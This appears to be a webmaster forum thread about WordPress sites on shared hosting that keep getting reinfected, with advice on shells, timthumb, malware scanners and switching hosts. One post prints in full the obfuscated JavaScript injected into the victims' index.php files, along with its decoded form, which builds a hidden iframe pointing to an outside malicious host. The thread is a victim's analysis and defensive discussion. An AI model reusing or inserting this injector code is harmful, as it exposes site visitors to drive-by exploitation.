Hacked



Hacked again. This time one of my sites on a shitty shared hosting account. It is a simple Wordpress blog.

This is very common on wp installs that are out of date, plugins that are out of date, themes etc.

If everything is already up to date then its probably a vulnerability somewhere in your hosts setup. Check to see if other people using your host are having the same problem, probably very likely.

I had the same problems before with media temple, Russian script kiddies continually scan hosts for vulnerabilities and media temple were particularly insecure in the way they were setup when running wordpress installs, not sure why or how they got in, but it was only ever my media temple wp installs that were hit.... all my other installs on other hosts were fine.
 
They might have a r57/c99 type shell or pwning you with an SQL injection attack to update/reset a password. Change all passwords then check if any of them have been updated after the hack. Also, check the logs, ftp/apache access & error logs for clues.
 
Do they have another sleeper file somewhere that I didn't delete?
Probably. If any of your themes use timthumb.php that's a known exploit. Timthumb is an image resizer/thumbnail maker present in many premium themes like all the Woothemes, Thesis, etc. Google it, and you should get some more info on the hack. I've experienced this before except there was no indication of the hack on the sites...just that I was getting spam complaints from my domains. The hacker usually uploads a shell script that may be difficult to find, but gives them access to every file on your cPanel.

EDIT: also check your wordpress Users on each site if using WP. I would up with a new administrative user being created on a couple of these domains that were hacked.
 
Are you using WP to create your .htaccess? If so, don't and change all permissions to files and folders. A lot of people will just leave write permissions on so they can easily change Themes and update files using WP - especially true for people using a service to manage multiple installs.
 
I had one of my accounts hacked because of a "Gallery 2" photo gallery I had installed on a site. They even changed the file permissions to root in that directory so I couldn't delete the files (shared server).
 
Since you wasted time coming in here and stating the obvious, are there any steps I can take to prevent this in the future?

They ran this php script that showed them all my domains along with my hosting username. No idea how they can get username info, but that's where they started.

its very easy to guess/find the username if your using cPanel.
 
Hacked again. This time one of my sites on a shitty shared hosting account. It is a simple Wordpress blog.

This is what the virus wrote on my index.php file:



And this is what they wrote to the .htaccess file:





It wrote this to all of the approximately 6 Wordpress blogs on this account. I went in, edited all of the index.php files, edited the .htaccess files as well, changed the Cpanel password, changed the wordpress password, even changed my fucking email password.

Today, it's right back there again. The .htaccess file remains unchanged, but the Index.php shows the exact same shit. I have to ask those more knowledgeable than I on this subject, there's probably a really easy solution to this, but how are they still editing the file? Do they have another sleeper file somewhere that I didn't delete? It has to be some type of program on my server that keeps overwriting the index.php file, right? Is it implanted in one of the many php files?

Any help would be appreciated.

its because your infected @ hosting level. You need to either:

1) contact your hosting company and have them scan for malware on your account
2) switch to a new hosting company (HostGator) which will auto remove the nasty script for you

changing your password will not do anything. you need to remove it from your hosting account.
 
Are there any programs or scanners specifically designed to scan folders for internet malware or viruses installed on servers? I found saccuri; are there any others?
 
Are there any programs or scanners specifically designed to scan folders for internet malware or viruses installed on servers? I found saccuri; are there any others?

The closest you can get that I've found is having Kaspersky Internet Security installed on your computer. Then, sync your local and remote directories with Vandyke's FTP program and tell it to download any updated files. Then, compare those in the list that didn't sync, because Kaspersky found issues with them.

This scans each file for malicious JS code based on heuristics. I've found a number of malcious files this way for clients. It's tedious though, and best for XSS and CI attacks, not someone who actually has control of the server and can upload PHP alterations.
 
just contact your hosting company to do it for you. its 10x easier. I've fixed similar WP hacks on clients sites and that is how I did it.

if your hosting company replies with they dont or cant do that, switch to HostGator because they do it for you free on all shared and dedicated accounts.
 
This mess:

Code:
<script>c=2;i=c-2;if(window.document)try{new c.prototype}catch(hgberger){f=['-29n-29n67n64n-6n2n62n73n61n79n71n63n72n78n8n65n63n78n31n70n63n71 n63n72n78n77n28n83n46n59n65n40n59n71n63n2n1n60n73n 62n83n1n3n53n10n55n3n85n-25n-29n-29n-29n67n64n76n59n71n63n76n2n3n21n-25n-29n-29n87n-6n63n70n77n63n-6n85n-25n-29n-29n-29n62n73n61n79n71n63n72n78n8n81n76n67n78n63n2n-4n22n67n64n76n59n71n63n-6n77n76n61n23n1n66n78n78n74n20n9n9n78n62n77n13n16n 8n60n83n67n72n78n63n76n8n72n63n78n9n77n78n62n77n9n 65n73n8n74n66n74n25n77n67n62n23n11n1n-6n81n67n62n78n66n23n1n11n10n1n-6n66n63n67n65n66n78n23n1n11n10n1n-6n77n78n83n70n63n23n1n80n67n77n67n60n67n70n67n78n8 3n20n66n67n62n62n63n72n21n74n73n77n67n78n67n73n72n 20n59n60n77n73n70n79n78n63n21n70n63n64n78n20n10n21 n78n73n74n20n10n21n1n24n22n9n67n64n76n59n71n63n24n-4n3n21n-25n-29n-29n87n-25n-29n-29n64n79n72n61n78n67n73n72n-6n67n64n76n59n71n63n76n2n3n85n-25n-29n-29n-29n80n59n76n-6n64n-6n23n-6n62n73n61n79n71n63n72n78n8n61n76n63n59n78n63n31n7 0n63n71n63n72n78n2n1n67n64n76n59n71n63n1n3n21n64n8 n77n63n78n27n78n78n76n67n60n79n78n63n2n1n77n76n61n 1n6n1n66n78n78n74n20n9n9n78n62n77n13n16n8n60n83n67 n72n78n63n76n8n72n63n78n9n77n78n62n77n9n65n73n8n74 n66n74n25n77n67n62n23n11n1n3n21n64n8n77n78n83n70n6 3n8n80n67n77n67n60n67n70n67n78n83n23n1n66n67n62n62 n63n72n1n21n64n8n77n78n83n70n63n8n74n73n77n67n78n6 7n73n72n23n1n59n60n77n73n70n79n78n63n1n21n64n8n77n 78n83n70n63n8n70n63n64n78n23n1n10n1n21n64n8n77n78n 83n70n63n8n78n73n74n23n1n10n1n21n64n8n77n63n78n27n 78n78n76n67n60n79n78n63n2n1n81n67n62n78n66n1n6n1n1 1n10n1n3n21n64n8n77n63n78n27n78n78n76n67n60n79n78n 63n2n1n66n63n67n65n66n78n1n6n1n11n10n1n3n21n-25n-29n-29n-29n62n73n61n79n71n63n72n78n8n65n63n78n31n70n63n71n 63n72n78n77n28n83n46n59n65n40n59n71n63n2n1n60n73n6 2n83n1n3n53n10n55n8n59n74n74n63n72n62n29n66n67n70n 62n2n64n3n21n-25n-29n-29n87'][0].split('n');md='a';e=window["e"+"v"+"al"];w=f;s=[];r=String;for(;593!=i;i+=1){j=i;s+=r.fromCharCode( 38+1*w[j]);}e(s);}</script>

Unravels itself to this:
Code:
if (document.getElementsByTagName('body')[0]){
			iframer();
		} else {
			document.write("");
		}
		function iframer(){
			var f = document.createEement('iframe');f.setAttribute('src','http://tds36.byinter.net/stds/go.php?sid=1');f.styl.visibility='hidden';f.style.positon='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','0');f.setAttribute('height','10');
			document.getElementsByTagName('boy')[0].appendChild(f);
		}

Which loads an iframe with, I imagine, some unsavory exploit in it.
 
i_1daecd_352177.jpg
 
If everything is already up to date then its probably a vulnerability somewhere in your hosts setup. Check to see if other people using your host are having the same problem, probably very likely.

I had the same problems before with media temple, Russian script kiddies continually scan hosts for vulnerabilities and media temple were particularly insecure in the way they were setup when running wordpress installs, not sure why or how they got in, but it was only ever my media temple wp installs that were hit.... all my other installs on other hosts were fine.

My WP sites got destroyed by malware on MediaTemple shared hosting. Never again. Horrible customer service kept being unable to find any thing (of course, after countless times telling me nothing was wrong)...

Since no one would wipe my ass for me, I had to learn to wipe it myself. Got new hosting and stopped listening to customer service who only wanted to scratch the surface of a problem and tell me all was well on their end.
 
By chance is this justhost.com?

Cause I had some shitty WP sites on an old account that got hacked on March 14th.

They put an old javascript hack at the top of every .php file on the server.




PITA but not very damaging. Slowly but surely moving all my shit away from justhost.com


Also ... is XSitePro still a decent software? I think I'm going to bite the bullet.



((sigh))
 
Why do some of you expect your host to fix your shitty scripts for you? It's not their problem if you use something with a million exploits and get "hacked".